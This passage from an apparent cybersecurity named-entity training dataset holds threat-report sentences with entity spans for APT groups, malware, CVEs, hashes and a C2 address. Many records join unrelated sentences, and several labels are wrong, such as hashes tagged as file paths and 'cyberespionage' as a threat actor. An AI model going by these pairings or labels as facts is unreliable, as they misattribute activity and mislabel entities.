Based on the targeting and lures , Unit 42 assesses that the Lotus Blossom actors ' collection requirements include militaries and government agencies in Southeast Asia .", "spans": {"MALWARE: Bisonal malware": [[129, 144]], "ORGANIZATION: Unit 42": [[237, 244]], "THREAT_ACTOR: Lotus Blossom actors": [[263, 283]], "ORGANIZATION: militaries": [[318, 328]], "ORGANIZATION: government agencies": [[333, 352]]}, "info": {"id": "cyberner_stix_train_003369", "source": "cyberner_stix_train"}} {"text": "We have observed Delphi , AutoIt , and C++ variants of Zebrocy , all of which are related not only in their functionality , but also at times by chaining the variants together in a single attack .", "spans": {"TOOL: Delphi": [[17, 23]], "TOOL: AutoIt": [[26, 32]], "TOOL: C++": [[39, 42]], "MALWARE: Zebrocy": [[55, 62]]}, "info": {"id": "cyberner_stix_train_003370", "source": "cyberner_stix_train"}} {"text": "According to our estimates , about 60 % of mobile malware are elements of both large and small mobile botnets . three computers in China being used to launch the Thrip attacks . By default , every keystroke is recorded using the Keylogger module ( 306, previously documented by Avast ) and saved to disk in the file %APPDATA%\\PAGM\\OEY\\XWWEYG\\WAOUE . 
Mandiant Threat Intelligence assesses that UNC2452 activity aligns with nation - state priorities broadly and that the group ’s targeting patterns are consistent with Russian strategic interests .", "spans": {"ORGANIZATION: Avast": [[278, 283]], "FILEPATH: %APPDATA%\\PAGM\\OEY\\XWWEYG\\WAOUE": [[316, 347]], "ORGANIZATION: Mandiant Threat Intelligence": [[350, 378]], "THREAT_ACTOR: UNC2452": [[393, 400]]}, "info": {"id": "cyberner_stix_train_003371", "source": "cyberner_stix_train"}} {"text": "Modified DLL file ( goopdate.dll ) used by BRONZE PRESIDENT to install RCSession : 0617cad9e5d559356c43d4037c86227f , f14eaf5d648aebb2ed7b00b2cf4349263b30fb1c , 2ea9ccf653f63bcc3549a313ec9d0bada341556cc32dd2ca4b73e0c034492740 .", "spans": {"TOOL: DLL": [[9, 12]], "FILEPATH: goopdate.dll": [[20, 32]], "THREAT_ACTOR: BRONZE PRESIDENT": [[43, 59]], "MALWARE: RCSession": [[71, 80]], "FILEPATH: 0617cad9e5d559356c43d4037c86227f": [[83, 115]], "FILEPATH: f14eaf5d648aebb2ed7b00b2cf4349263b30fb1c": [[118, 158]], "FILEPATH: 2ea9ccf653f63bcc3549a313ec9d0bada341556cc32dd2ca4b73e0c034492740": [[161, 225]]}, "info": {"id": "cyberner_stix_train_003372", "source": "cyberner_stix_train"}} {"text": "The purpose of this module is to extract and execute a malicious payload – the “ patch ” module . Sometimes , the attackers use sub-domains on the exploit websites , to make them seem more legitimate . Process hollowing is a technique that can hide malware within a legitimate system process . 
Malwarebytes 's EDR shows the full attack chain ( please click to enlarge ): The NetSupport RAT files are hosted on the same compromised WordPress site used earlier to download the Internet shortcut .", "spans": {"TOOL: sub-domains": [[128, 139]], "TOOL: Process hollowing": [[202, 219]], "ORGANIZATION: Malwarebytes 's EDR": [[294, 313]], "MALWARE: NetSupport RAT": [[375, 389]]}, "info": {"id": "cyberner_stix_train_003373", "source": "cyberner_stix_train"}} {"text": "APT15 is known for committing cyberespionage against companies and organizations located in many different countries , targeting different sectors such as the oil industry , government contractors , military , and more . Over the months following the elections , the accounts of Iranians that had been compromised by the actors were then used for spreading the malware .", "spans": {"THREAT_ACTOR: APT15": [[0, 5]], "THREAT_ACTOR: cyberespionage": [[30, 44]], "ORGANIZATION: oil industry": [[159, 171]], "ORGANIZATION: government contractors": [[174, 196]], "ORGANIZATION: military": [[199, 207]], "ORGANIZATION: Iranians": [[279, 287]]}, "info": {"id": "cyberner_stix_train_003374", "source": "cyberner_stix_train"}} {"text": "As the code snippet shows , the malware creates a notification builder and then does the following : setCategory ( “ call ” ) – This means that the notification is built as a very important notification that needs special privilege . Honeybee attacked beyond the borders of South Korea to target Vietnam , Singapore , Argentina , Japan , Indonesia , and Canada . 
( On hosts of interest , Agrius deploys its own custom malware a .NET backdoor called IPsec Helper , which registers itself as a service to establish persistence .", "spans": {"THREAT_ACTOR: Honeybee": [[234, 242]], "THREAT_ACTOR: Agrius": [[388, 394]], "MALWARE: malware": [[418, 425]], "MALWARE: called IPsec Helper": [[442, 461]]}, "info": {"id": "cyberner_stix_train_003375", "source": "cyberner_stix_train"}} {"text": "The Flash zero-day exploit ( CVE-2015-5119 ) was added into the Angler Exploit Kit and Nuclear Exploit Pack . The Cobalt started its high-tech criminal activities in late 2013 by launching the Anunak malware campaign that targeted financial transfers and ATM networks of financial institutions around the world . some functions in the ANEL sample have multiple control dispatchers . None Use of Python for malware development and/or packaging : We expect to continue to observe attackers compiling or packaging their OT malware via methods such as PyInstaller ( IRONGATE ) or Py2Exe ( TRITON ) given the proliferation of OT malware developed or packaged using Python in recent years .", "spans": {"SYSTEM: Flash": [[4, 9]], "VULNERABILITY: CVE-2015-5119": [[29, 42]], "MALWARE: Angler Exploit Kit": [[64, 82]], "MALWARE: Nuclear Exploit Pack": [[87, 107]], "THREAT_ACTOR: Cobalt": [[114, 120]], "ORGANIZATION: financial institutions": [[271, 293]], "TOOL: Python": [[395, 401], [660, 666]], "THREAT_ACTOR: attackers": [[478, 487]], "MALWARE: OT malware": [[517, 527], [621, 631]], "TOOL: PyInstaller": [[548, 559]], "MALWARE: IRONGATE": [[562, 570]], "TOOL: Py2Exe": [[576, 582]], "MALWARE: TRITON": [[585, 591]]}, "info": {"id": "cyberner_stix_train_003376", "source": "cyberner_stix_train"}} {"text": "Payload deployment Once the static block execution is complete , the Android Lifecycle callback transfers the control to the OnCreate method of the main class . APT15 was targeting information related to UK government departments and military technology . 
After the first EOCD comes some extra data – another ZIP file . Initially engaged in espionage activity , Agrius deployed a set of destructive wiper attacks against Israeli targets , masquerading the activity as ransomware attacks .", "spans": {"SYSTEM: Android Lifecycle": [[69, 86]], "THREAT_ACTOR: APT15": [[161, 166]], "ORGANIZATION: government": [[207, 217]], "ORGANIZATION: military technology": [[234, 253]], "THREAT_ACTOR: Agrius": [[362, 368]], "ORGANIZATION: Israeli targets": [[421, 436]]}, "info": {"id": "cyberner_stix_train_003377", "source": "cyberner_stix_train"}} {"text": "But according to Gnosticplayers , his foray into a public marketplace like Dream has two goals --besides the first and obvious one being money . SPEAR identified recent PassCV samples which implemented another commercial off-the-shelf ( COTS ) RAT called Netwire .", "spans": {"ORGANIZATION: SPEAR": [[145, 150]], "MALWARE: PassCV samples": [[169, 183]], "MALWARE: RAT": [[244, 247]], "MALWARE: Netwire": [[255, 262]]}, "info": {"id": "cyberner_stix_train_003379", "source": "cyberner_stix_train"}} {"text": "Both groups can set permissions on specific files to Everyone , and work in tandem with the PLATINUM backdoors . 
Recently , the JPCERT published a thorough analysis of the Plead backdoor , which , according to Trend Micro , is used by the cyberespionage group BlackTech .", "spans": {"THREAT_ACTOR: groups": [[5, 11]], "TOOL: PLATINUM backdoors": [[92, 110]], "ORGANIZATION: JPCERT": [[128, 134]], "MALWARE: Plead backdoor": [[172, 186]], "ORGANIZATION: Trend Micro": [[210, 221]]}, "info": {"id": "cyberner_stix_train_003380", "source": "cyberner_stix_train"}} {"text": "Metasploit is an open source framework popular as a tool for developing and executing exploit code against a remote target machine .", "spans": {"TOOL: Metasploit": [[0, 10]]}, "info": {"id": "cyberner_stix_train_003381", "source": "cyberner_stix_train"}} {"text": "Another common step taken by threat actors is changing their system's MAC Address to avoid being uniquely identified . Since at least 2014 , APT32 , also known as the OceanLotus Group , has targeted foreign corporations with investments in Vietnam , foreign governments , journalists , and Vietnamese dissidents .", "spans": {"THREAT_ACTOR: actors": [[36, 42]], "THREAT_ACTOR: APT32": [[141, 146]], "THREAT_ACTOR: OceanLotus Group": [[167, 183]], "ORGANIZATION: foreign corporations": [[199, 219]], "ORGANIZATION: foreign governments": [[250, 269]], "ORGANIZATION: journalists": [[272, 283]], "ORGANIZATION: dissidents": [[301, 311]]}, "info": {"id": "cyberner_stix_train_003382", "source": "cyberner_stix_train"}} {"text": "It is very easy to trick victims to fall for such attacks . Further analysis showed that the Iron cybercrime group used two main functions from HackingTeam's source in both IronStealer and Iron ransomware . 
Group5 is a threat group with a suspected Iranian nexus , though this attribution is not definite .", "spans": {"THREAT_ACTOR: Iron": [[93, 97]], "TOOL: IronStealer": [[173, 184]], "TOOL: Iron ransomware": [[189, 204]], "THREAT_ACTOR: Group5": [[207, 213]]}, "info": {"id": "cyberner_stix_train_003383", "source": "cyberner_stix_train"}} {"text": "Most attackers target vulnerable applications and operating systems .", "spans": {"TOOL: operating systems": [[50, 67]]}, "info": {"id": "cyberner_stix_train_003384", "source": "cyberner_stix_train"}} {"text": "The Arabic-language text and English translation of the document are available in ThreatConnect here .", "spans": {"ORGANIZATION: ThreatConnect": [[82, 95]]}, "info": {"id": "cyberner_stix_train_003385", "source": "cyberner_stix_train"}} {"text": "And our researchers estimate that in every 10 Android users 1 was attacked by either one or several of those Trojans during the second half of 2015 , so there are millions of devices with a huge possibility of being infected with Triada . WannaCry incorporated the leaked EternalBlue exploit that used two known vulnerabilities in Windows CVE-2017-0144 and CVE-2017-0145 to turn the ransomware into a worm , capable of spreading itself to any unpatched computers on the victim's network and also to other vulnerable computers connected to the internet . 
We assess that APT34 works on behalf of the Iranian government based on infrastructure details that contain references to Iran , use of Iranian infrastructure , and targeting that aligns with nation-state interests .", "spans": {"SYSTEM: Android": [[46, 53]], "MALWARE: Triada": [[230, 236]], "VULNERABILITY: CVE-2017-0144": [[339, 352]], "VULNERABILITY: CVE-2017-0145": [[357, 370]], "THREAT_ACTOR: APT34": [[569, 574]]}, "info": {"id": "cyberner_stix_train_003386", "source": "cyberner_stix_train"}} {"text": "Timeline of posts related to the Hacking Team DATE UPDATE July 5 The Italian company Hacking Team was hacked , with more than 400GB of confidential company data made available to the public . Since 2013 , the Cobalt have attempted to attack banks and financial institutions using pieces of malware they designed . it attempts to guess the next block number based on the address , This actor uses these vulnerabilities to deploy webshells including CHINACHOP .", "spans": {"ORGANIZATION: Hacking Team": [[85, 97]], "THREAT_ACTOR: Cobalt": [[209, 215]], "ORGANIZATION: banks": [[241, 246]], "ORGANIZATION: financial institutions": [[251, 273]], "MALWARE: CHINACHOP": [[448, 457]]}, "info": {"id": "cyberner_stix_train_003387", "source": "cyberner_stix_train"}} {"text": "Leveraging this intelligence allowed us to begin predicting potential C2 domains that would eventually be used by the Sofacy group .", "spans": {"TOOL: C2": [[70, 72]], "THREAT_ACTOR: Sofacy": [[118, 124]]}, "info": {"id": "cyberner_stix_train_003388", "source": "cyberner_stix_train"}} {"text": "Our Investigation into both clusters further showed that they were both involved in attacks targeting organizations in South East Asia . 
Based on this , we believe the Rancor attackers were targeting political entities .", "spans": {"THREAT_ACTOR: Rancor": [[168, 174]], "THREAT_ACTOR: attackers": [[175, 184]], "ORGANIZATION: political entities": [[200, 218]]}, "info": {"id": "cyberner_stix_train_003389", "source": "cyberner_stix_train"}} {"text": "Second , the app can set a custom delay between displaying ads . Analysis of the payload allowed us to confidently link this attack to an actor Kaspersky track as BlackOasis . This file drops exactly the same files than the previous campaign but the decoy document is different .", "spans": {"ORGANIZATION: Kaspersky": [[144, 153]], "THREAT_ACTOR: BlackOasis": [[163, 173]]}, "info": {"id": "cyberner_stix_train_003390", "source": "cyberner_stix_train"}} {"text": "Older documents used by Patchwork focused on the CVE-2017-0261 vulnerability , however in late January 2018 when , paradoxically , newer documents abandoned this vulnerability to attack the older CVE-2015-2545 vulnerability . TAA not only flagged this malicious use of PsExec , it also told us what the attackers were using it for .", "spans": {"THREAT_ACTOR: Patchwork": [[24, 33]], "VULNERABILITY: CVE-2017-0261": [[49, 62]], "VULNERABILITY: CVE-2015-2545": [[196, 209]], "ORGANIZATION: TAA": [[226, 229]], "MALWARE: PsExec": [[269, 275]]}, "info": {"id": "cyberner_stix_train_003391", "source": "cyberner_stix_train"}} {"text": "The exploitation of this vulnerability is not unique to Emissary Panda , as multiple threat groups are using this vulnerability to exploit SharePoint servers to gain initial access to targeted networks .", "spans": {"THREAT_ACTOR: Emissary Panda": [[56, 70]], "TOOL: SharePoint": [[139, 149]]}, "info": {"id": "cyberner_stix_train_003392", "source": "cyberner_stix_train"}} {"text": "The ScarCruft APT gang has made use of a Flash zero day patched Thursday by Adobe to attack more than two dozen high-profile targets in Russia and Asia primarily . 
APT5 also targeted the networks of some of Southeast Asia 's major telecommunications providers with Leouncia malware .", "spans": {"VULNERABILITY: Flash zero day": [[41, 55]], "ORGANIZATION: telecommunications providers": [[231, 259]], "MALWARE: Leouncia": [[265, 273]], "MALWARE: malware": [[274, 281]]}, "info": {"id": "cyberner_stix_train_003393", "source": "cyberner_stix_train"}} {"text": "] com hxxp : //mailsa-wqo [ . In our 2014 report , we identified APT28 as a suspected Russian government-sponsored espionage actor . To support this capability, the adversaries chose to manually craft the DNS queries and communicate directly with the controller as opposed to using existing .NET DNS . Whoever hacked Ashley Madison had access to all employee emails , but they only released Biderman ’s messages — three years worth .", "spans": {"THREAT_ACTOR: APT28": [[65, 70]], "THREAT_ACTOR: espionage actor": [[115, 130]], "FILEPATH: .NET": [[291, 295]], "ORGANIZATION: Ashley Madison": [[317, 331]]}, "info": {"id": "cyberner_stix_train_003394", "source": "cyberner_stix_train"}} {"text": "The only difference introduced is that an event named “ WerTyQ34C ” can be signalled by the function “ NvStop ” to terminate the message loop and stop processing .", "spans": {}, "info": {"id": "cyberner_stix_train_003395", "source": "cyberner_stix_train"}} {"text": "The a binary is a script wrapper to start run , a Perl-obfuscated script for installation of a Shellbot to gain control of the infected system .", "spans": {"TOOL: Perl-obfuscated": [[50, 65]], "MALWARE: Shellbot": [[95, 103]]}, "info": {"id": "cyberner_stix_train_003396", "source": "cyberner_stix_train"}} {"text": "These threats are capable of opening a back door and stealing information from victims' computers . 
TG-3390 actors have used Java exploits in their SWCs .", "spans": {"THREAT_ACTOR: TG-3390": [[100, 107]], "TOOL: Java": [[125, 129]], "MALWARE: SWCs": [[148, 152]]}, "info": {"id": "cyberner_stix_train_003397", "source": "cyberner_stix_train"}} {"text": "It is unclear how long the malicious code existed inside the apps , hence the actual spread of the malware remains unknown . The Winnti umbrella continues to operate highly successfully in 2018 . We will take a look at the keylogger later on . Enable robust application logging for MicroSCADA and aggregate logs to a central location .", "spans": {"TOOL: keylogger": [[223, 232]]}, "info": {"id": "cyberner_stix_train_003398", "source": "cyberner_stix_train"}} {"text": "HummingWhale , by contrast , managed to sneak its way into about 20 Google Play apps that were downloaded from 2 million to 12 million times , according to researchers from Check Point , the security company that has been closely following the malware family for almost a year . Rather , PapaAlfa could be considered a smart proxy due in part to the fact that the Lazarus can easily switch the backend destination address and port without having to reestablish control over the infected machine hosting the PapaAlfa malware . Because the Elfin and the Shamoon attacks against this organization occurred so close together , there has been speculation that the two groups may be linked . 
If you can not apply the KB5019758 patch immediately , you should disable OWA until the patch can be applied .", "spans": {"MALWARE: HummingWhale": [[0, 12]], "SYSTEM: Google Play": [[68, 79]], "ORGANIZATION: Check Point": [[173, 184]], "TOOL: PapaAlfa": [[288, 296]], "THREAT_ACTOR: Lazarus": [[364, 371]], "TOOL: PapaAlfa malware": [[507, 523]], "THREAT_ACTOR: Elfin": [[538, 543]], "THREAT_ACTOR: Shamoon": [[552, 559]]}, "info": {"id": "cyberner_stix_train_003399", "source": "cyberner_stix_train"}} {"text": "We identified decoy files which indicate these attacks began with spear phishing messages but have not observed the actual messages . Hancom Office is widely used in South Korea .", "spans": {"MALWARE: decoy files": [[14, 25]]}, "info": {"id": "cyberner_stix_train_003400", "source": "cyberner_stix_train"}} {"text": "While one variant will use a preconfigured C&C server over HTTP or HTTPS , the other variant will use a Microsoft OneDrive account to exchange commands and stolen data with its operators .", "spans": {"TOOL: C&C": [[43, 46]], "ORGANIZATION: Microsoft": [[104, 113]], "TOOL: OneDrive": [[114, 122]]}, "info": {"id": "cyberner_stix_train_003401", "source": "cyberner_stix_train"}} {"text": "We however feel it is unlikely that the CosmicDuke operators targeting drug dealers and those targeting governments could be two entirely independent entities .", "spans": {"MALWARE: CosmicDuke": [[40, 50]]}, "info": {"id": "cyberner_stix_train_003402", "source": "cyberner_stix_train"}} {"text": "Before sending any data to the C2 using the trojan attempts to disguise its data , the data is serialized using JSON , which is then encoded in Base64 . After a successful phishing attack in which users have opened emails and browsed to malicious links , ITG08 attackers install the More_eggs JScript backdoor on user devices alongside several other malware components . 
APT38 is a financially motivated North Korean regime-backed group responsible for conducting destructive attacks against financial institutions , as well as some of the world .", "spans": {"THREAT_ACTOR: ITG08": [[255, 260]], "TOOL: More_eggs JScript backdoor": [[283, 309]], "THREAT_ACTOR: APT38": [[371, 376]], "ORGANIZATION: financial institutions": [[492, 514]]}, "info": {"id": "cyberner_stix_train_003403", "source": "cyberner_stix_train"}} {"text": "This task proved to be nontrivial . Depending on placement , a web shell can provide continued access to victims ' environments , re-infect victim systems , and facilitate lateral movement . The data received from the C&C server is encrypted using the same key . As outlined in recent research detailing the GRU 's disruptive playbook , we have observed Sandworm adopting LotL tactics across its wider operations to similarly increase the speed and scale at which it can operate while minimizing the odds of detection .", "spans": {"THREAT_ACTOR: Sandworm": [[354, 362]]}, "info": {"id": "cyberner_stix_train_003404", "source": "cyberner_stix_train"}} {"text": "APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments and militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian Government . 
In addition to these , we also identified \" Macfog \" , a native Mac OS X implementation of Icefog that infected several hundred victims worldwide .", "spans": {"ORGANIZATION: governments": [[137, 148]], "ORGANIZATION: militaries": [[153, 163]], "ORGANIZATION: defense attaches": [[166, 182]], "ORGANIZATION: media entities": [[185, 199]], "ORGANIZATION: dissidents": [[206, 216]], "ORGANIZATION: figures": [[221, 228]], "MALWARE: Macfog": [[317, 323]], "MALWARE: native Mac OS X implementation": [[330, 360]], "MALWARE: Icefog": [[364, 370]]}, "info": {"id": "cyberner_stix_train_003405", "source": "cyberner_stix_train"}} {"text": "Deserialize the decrypted response into another client response object .", "spans": {}, "info": {"id": "cyberner_stix_train_003406", "source": "cyberner_stix_train"}} {"text": "Analysis of the Royal Road weaponizer has resulted in the discovery that multiple Chinese threat groups started utilizing CVE-2018-0798 in their RTF weaponizer . Our initial observation of the Bahamut group originated from in-the-wild attempts to deceive targets into providing account passwords through impersonation of platform providers .", "spans": {"THREAT_ACTOR: threat groups": [[90, 103]], "VULNERABILITY: CVE-2018-0798": [[122, 135]], "TOOL: RTF weaponizer": [[145, 159]], "ORGANIZATION: platform providers": [[321, 339]]}, "info": {"id": "cyberner_stix_train_003407", "source": "cyberner_stix_train"}} {"text": "\" WzI3MDg5LDI4NjE4LDk4MzMsNDE3MCwyNTcyMiwxOTk3NywyMzY5LDIxNDI2LDM0MzUsNzQ0MiwzMDE0NiwyMTcxOSwxNjE0MCwxNjI4MCwxNjY4OCwyMjU1MCwxOTg2NywxOTQsMzI5OF0= \" .", "spans": {}, "info": {"id": "cyberner_stix_train_003408", "source": "cyberner_stix_train"}} {"text": "as the user agent , while more recent samples use “ OPAERA ”", "spans": {}, "info": {"id": "cyberner_stix_train_003409", "source": "cyberner_stix_train"}} {"text": "We believe this backdoor is relatively new and seems to have appeared starting in the beginning of 2019 .", "spans": {}, "info": {"id": 
"cyberner_stix_train_003410", "source": "cyberner_stix_train"}} {"text": "ACCESS_NETWORK_STATE - Allows the application to access information about networks . However , this action doesn’t appear to have made a dent in the cybercriminal organization , as subsequent spear-phishing campaigns seem to have been reported from March until May 2018 . As we continued to investigate , it became apparent that Gorgon Group had been consistently targeting worldwide governmental organizations operating within Pakistan .", "spans": {"THREAT_ACTOR: Gorgon Group": [[329, 341]], "ORGANIZATION: governmental organizations": [[384, 410]]}, "info": {"id": "cyberner_stix_train_003411", "source": "cyberner_stix_train"}} {"text": "In most cases , LEAD ’s attacks do not feature any advanced exploit techniques .", "spans": {"THREAT_ACTOR: LEAD": [[16, 20]]}, "info": {"id": "cyberner_stix_train_003412", "source": "cyberner_stix_train"}} {"text": "In addition , the malware can log in to the attacker ’ s email inbox , parse emails in a special folder for commands and save any payloads to a device from email attachments . This campaign is tailored to identifying those who are running Bitcoin related software through specific system scans . A second JavaScript command was also executed , which created a scheduled task to execute chfeeds.vbe multiple times a day . Mandiant has previously identified the domain wasxxv[.]site being used by North Korean threat actors .", "spans": {"FILEPATH: chfeeds.vbe": [[386, 397]], "THREAT_ACTOR: North Korean threat actors": [[495, 521]]}, "info": {"id": "cyberner_stix_train_003413", "source": "cyberner_stix_train"}} {"text": "Several analysis reports were published on this malware in 2014 and , finally , the source code was leaked in 2015 . Since at least 2008 , The Lamberts have used multiple sophisticated attack tools against high-profile victims . 
Some of the campaign codes we have seen include : CRML_0505 , CRML_MIL , Firebox4 , JUST_0525 , ML0628 , MW0629 , OM222 . Our demonstration shows how using the Google Analytics API , a web skimmer can send data to be collected in his own account instance .", "spans": {"TOOL: Lamberts": [[143, 151]], "MALWARE: CRML_0505": [[279, 288]], "MALWARE: CRML_MIL": [[291, 299]], "MALWARE: Firebox4": [[302, 310]], "MALWARE: JUST_0525": [[313, 322]], "MALWARE: ML0628": [[325, 331]], "MALWARE: MW0629": [[334, 340]], "MALWARE: OM222": [[343, 348]], "SYSTEM: Google Analytics API": [[389, 409]], "THREAT_ACTOR: a web skimmer": [[412, 425]]}, "info": {"id": "cyberner_stix_train_003414", "source": "cyberner_stix_train"}} {"text": "Adobe on Thursday patched a zero-day vulnerability in Flash Player that has been used in targeted attacks carried out by a new APT group operating primarily against high-profile victims in Russia and Asia . We suspect that the group sought access to these networks to obtain information that would enable it to monitor communications passing through the providers' systems .", "spans": {"VULNERABILITY: zero-day vulnerability": [[28, 50]]}, "info": {"id": "cyberner_stix_train_003415", "source": "cyberner_stix_train"}} {"text": "So far , this software ( along with the Android version ) has been made available through phishing sites that imitated Italian and Turkmenistani mobile carriers . WannaCry utilizes EternalBlue by crafting a custom SMB session request with hard-coded values based on the target system . 
The new spear-phishing docs used by MuddyWater rely on social engineering to persuade users to enable macros .", "spans": {"SYSTEM: Android": [[40, 47]], "TOOL: WannaCry": [[163, 171]], "VULNERABILITY: EternalBlue": [[181, 192]], "TOOL: SMB": [[214, 217]], "THREAT_ACTOR: MuddyWater": [[322, 332]], "ORGANIZATION: social engineering": [[341, 359]]}, "info": {"id": "cyberner_stix_train_003416", "source": "cyberner_stix_train"}} {"text": "For the .NET version , the following registry key and value are used for persistence :", "spans": {"TOOL: .NET": [[8, 12]]}, "info": {"id": "cyberner_stix_train_003417", "source": "cyberner_stix_train"}} {"text": "We have directly observed multiple copies of Exodus with more than 50 installs and we can estimate the total number of infections to amount in the several hundreds , if not a thousand or more . While continuing research on the August 2018 attacks on a Middle eastern government that delivered BONDUPDATER , Unit 42 researchers observed OilRig 's testing activities and with high confidence links this testing to the creation of the weaponized delivery document used in this attack . The actor used the same technique in the macro and in the JhoneRAT . A main goal of this attack was to obtain access to email accounts .", "spans": {"MALWARE: Exodus": [[45, 51]], "ORGANIZATION: government": [[267, 277]], "TOOL: BONDUPDATER": [[293, 304]], "ORGANIZATION: Unit 42": [[307, 314]], "THREAT_ACTOR: OilRig": [[336, 342]], "TOOL: macro": [[524, 529]], "MALWARE: JhoneRAT": [[541, 549]]}, "info": {"id": "cyberner_stix_train_003418", "source": "cyberner_stix_train"}} {"text": "Signing malware with code-signing certificates is becoming more common , as seen in this investigation and the other attacks we have discussed .", "spans": {}, "info": {"id": "cyberner_stix_train_003419", "source": "cyberner_stix_train"}} {"text": "Threat actors may use the date string hardcoded into each Bookworm sample as a build identifier . 
This threat is another proof point that attackers are clearly incorporating the mobile device into their surveillance campaigns as a primary attack vector .", "spans": {"MALWARE: date string hardcoded": [[26, 47]], "TOOL: Bookworm sample": [[58, 73]], "MALWARE: mobile device": [[178, 191]]}, "info": {"id": "cyberner_stix_train_003420", "source": "cyberner_stix_train"}} {"text": "While there have been several Suckfly campaigns that infected organizations with the group ’s custom malware Backdoor.Nidiran , the Indian targets show a greater amount of post-infection activity than targets in other regions .", "spans": {"THREAT_ACTOR: Suckfly": [[30, 37]], "MALWARE: Backdoor.Nidiran": [[109, 125]]}, "info": {"id": "cyberner_stix_train_003421", "source": "cyberner_stix_train"}} {"text": "2016 We do not know exactly how many people have been infected with RuMMS malware ; however , our data suggests that there are at least 2,729 infections with RuMMS samples from January 2016 to early April 2016 . In the January 16 , 2018 attack , we observed OilRig attacking an organization it previously targeted in January 2017 . The purpose is to download an image from a new Google Drive link . These types of threat actors will be attempting to cause the most embarrassment andor pain to prove the company can not function without them .", "spans": {"MALWARE: RuMMS": [[68, 73], [158, 163]]}, "info": {"id": "cyberner_stix_train_003422", "source": "cyberner_stix_train"}} {"text": "Shamoon2 : 69.87.223.26:8080/eiloShaegae1 .", "spans": {"MALWARE: Shamoon2": [[0, 8]], "DOMAIN: 69.87.223.26:8080/eiloShaegae1": [[11, 41]]}, "info": {"id": "cyberner_stix_train_003423", "source": "cyberner_stix_train"}} {"text": "At the time of analysis , the subdomains did not host a website; however , based on BITTER APT group’s targeting patterns , it is highly likely that they were created to host faux login phishing pages designed to steal user’s credentials . 
Hackers first actively spread bots using the Niteris exploit , and then search for infected devices at banks amongst their bots by analyzing IP addresses , cracked passwords and results of the modules performance .", "spans": {"THREAT_ACTOR: BITTER APT": [[84, 94]], "TOOL: Niteris": [[285, 292]], "VULNERABILITY: exploit": [[293, 300]], "ORGANIZATION: banks": [[343, 348]]}, "info": {"id": "cyberner_stix_train_003424", "source": "cyberner_stix_train"}} {"text": "Extract call logs , contacts and messages from the Skype app . the group 's targets include an organization in Sweden . Using Geopolitically-charged Lure Content : The attackers use specially crafted lure content to trick their targets into opening malicious files that infect the victim ’s machine with the Pierogi backdoor . The name “ Anonymous Sudan ” is likely an attempted appropriation of the brand of the well - known hacktivist collective “ Anonymous , ” similar to another KillNet affiliate , “ Anonymous Russia . ”", "spans": {"SYSTEM: Skype": [[51, 56]], "MALWARE: Pierogi backdoor": [[308, 324]], "THREAT_ACTOR: Anonymous Sudan": [[338, 353]], "THREAT_ACTOR: Anonymous Russia": [[505, 521]]}, "info": {"id": "cyberner_stix_train_003425", "source": "cyberner_stix_train"}} {"text": "W:\\Visual Studio 2017\\Spark4.2\\Release\\Spark4.2.pdb .", "spans": {"FILEPATH: W:\\Visual Studio 2017\\Spark4.2\\Release\\Spark4.2.pdb": [[0, 51]]}, "info": {"id": "cyberner_stix_train_003426", "source": "cyberner_stix_train"}} {"text": "“ Agent Smith ” itself , though , seems to target mainly India users . Overall , the Bookworm infrastructure overlaps with the infrastructure hosting C2 servers used by various attack tools , including FFRAT , Poison Ivy , PlugX , and others . Over time , Dexphot-related malicious behavior reports dropped to a low hum , as the threat lost steam . 
Encrypted Channel APT29 has used multiple layers of encryption within malware to protect C2 communication .", "spans": {"MALWARE: Agent Smith": [[2, 13]], "TOOL: Bookworm": [[85, 93]], "TOOL: FFRAT": [[202, 207]], "TOOL: Poison Ivy": [[210, 220]], "TOOL: PlugX": [[223, 228]], "THREAT_ACTOR: APT29": [[367, 372]]}, "info": {"id": "cyberner_stix_train_003427", "source": "cyberner_stix_train"}} {"text": "We believe this spyware platform is developed by an Italian company called eSurv , which primarily operates in the business of video surveillance . POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 . This RAT uses three different cloud services to perform all its command and control ( C2 ) activities . The attackers only managed to deploy it to three machines on the organizations network and it was blocked on two of those three computers .", "spans": {"ORGANIZATION: eSurv": [[75, 80]], "TOOL: POWRUNER": [[148, 156]], "TOOL: malicious RTF": [[179, 192]], "VULNERABILITY: CVE-2017-0199": [[213, 226]], "TOOL: RAT": [[234, 237]], "TOOL: command and control": [[293, 312]], "TOOL: C2": [[315, 317]], "THREAT_ACTOR: The attackers": [[333, 346]]}, "info": {"id": "cyberner_stix_train_003428", "source": "cyberner_stix_train"}} {"text": "In 2013 , many of the decoy documents employed by the Dukes in their campaigns were related to Ukraine ; examples include a letter undersigned by the First Deputy Minister for Foreign Affairs of Ukraine , a letter from the embassy of the Netherlands in Ukraine to the Ukrainian Ministry of Foreign affairs and a document titled “ Ukraine ’s Search for a Regional Foreign Policy ” .", "spans": {"THREAT_ACTOR: Dukes": [[54, 59]], "ORGANIZATION: Foreign Affairs": [[176, 191]], "ORGANIZATION: Ukrainian Ministry": [[268, 286]], "ORGANIZATION: Foreign affairs": [[290, 305]]}, "info": {"id": "cyberner_stix_train_003429", "source": "cyberner_stix_train"}} {"text": "How to unblock the phone Now for some good news : Rotexy doesn ’ t 
have a very well-designed module for processing commands that arrive in SMSs . If the document was delivered with macros instead of exploits ( CVE-2012-0158 , CVE-2013-3906 or CVE-2014-1761 ) , then the document contained instructions for enabling macros . The period between November 2014 and January 2015 marked one of the earlier instances in which Proofpoint observed persistent exploitation attempts by this actor .", "spans": {"MALWARE: Rotexy": [[50, 56]], "MALWARE: document": [[153, 161]], "VULNERABILITY: CVE-2012-0158": [[210, 223]], "VULNERABILITY: CVE-2013-3906": [[226, 239]], "VULNERABILITY: CVE-2014-1761": [[243, 256]], "ORGANIZATION: Proofpoint": [[419, 429]], "THREAT_ACTOR: actor": [[480, 485]]}, "info": {"id": "cyberner_stix_train_003430", "source": "cyberner_stix_train"}} {"text": "The Sednit group – also known as APT28 , Fancy Bear , Sofacy or STRONTIUM – has been operating since at least 2004 and has made headlines frequently in past years .", "spans": {"THREAT_ACTOR: Sednit": [[4, 10]], "THREAT_ACTOR: APT28": [[33, 38]], "THREAT_ACTOR: Fancy Bear": [[41, 51]], "THREAT_ACTOR: Sofacy": [[54, 60]], "THREAT_ACTOR: STRONTIUM": [[64, 73]]}, "info": {"id": "cyberner_stix_train_003431", "source": "cyberner_stix_train"}} {"text": "The ScarCruft group keeps expanding its exfiltration targets to steal further information from infected hosts and continues to create tools for additional data 